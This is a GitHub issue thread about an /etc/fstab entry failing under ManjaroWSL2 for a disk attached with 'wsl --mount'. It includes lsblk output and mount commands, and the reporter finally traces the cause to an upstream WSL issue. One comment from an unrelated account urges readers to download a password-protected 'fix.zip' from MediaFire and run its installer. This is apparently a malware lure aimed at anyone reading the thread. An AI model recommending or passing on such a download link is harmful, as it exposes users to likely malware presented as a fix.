### ISSUE TITLE
fstab not working

### ISSUE THREAD

**Issue by FlysoftBeta** [sileshn/ManjaroWSL2#25]
### Requirements

- [X] Yes
- [ ] No

### WSL Version

- [X] WSL 2
- [ ] WSL 1

### Version

Microsoft Windows [Version 10.0.22631.4112]

### Kernel Version

Linux version 5.15.153.1-microsoft-standard-WSL2 (root@941d701f84f1) (gcc (GCC) 11.2.0, GNU ld (GNU Binutils) 2.37) #1 SMP Fri Mar 29 23:14:13 UTC 2024

### Repro Steps

```sh
$ # Mount the Disk
$ wsl --mount \\.\PHYSICALDRIVE2 --bare
$ # List newly added blocks
$ sudo lsblk
NAME   MAJ:MIN RM   SIZE RO TYPE MOUNTPOINTS
sda      8:0    0 388.6M  1 disk
sdb      8:16   0     4G  0 disk [SWAP]
sdc      8:32   0     1T  0 disk /mnt/wslg/distro
                                 /
sdd      8:48   0 931.5G  0 disk
├─sdd1   8:49   0   300M  0 part
├─sdd2   8:50   0 896.9G  0 part
└─sdd3   8:51   0  34.3G  0 part
$ # Add it to /etc/fstab
$ sudo sh -c 'echo "UUID=xxx /mnt/mountpoint ext4 defaults 0 0" >> /etc/fstab'
$ sudo mkdir /mnt/mountpoint
$ wsl --shutdown && wsl # Relaunch wsl
Processing fstab with mount -a failed.
$
```

and if you try manually mount it it works

```sh
$ sudo mount /dev/sdd2 /mnt/mountpoint
```

### Expected Behavior

same as
```sh
$ sudo mount /dev/sdd2 /mnt/mountpoint
```

### Actual Behavior

shows:
Processing fstab with mount -a failed.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by FlysoftBeta** [comment]
Should be a upstream issue (wsl --mount) does not persist over reboots:

https://github.com/microsoft/WSL/issues/6073
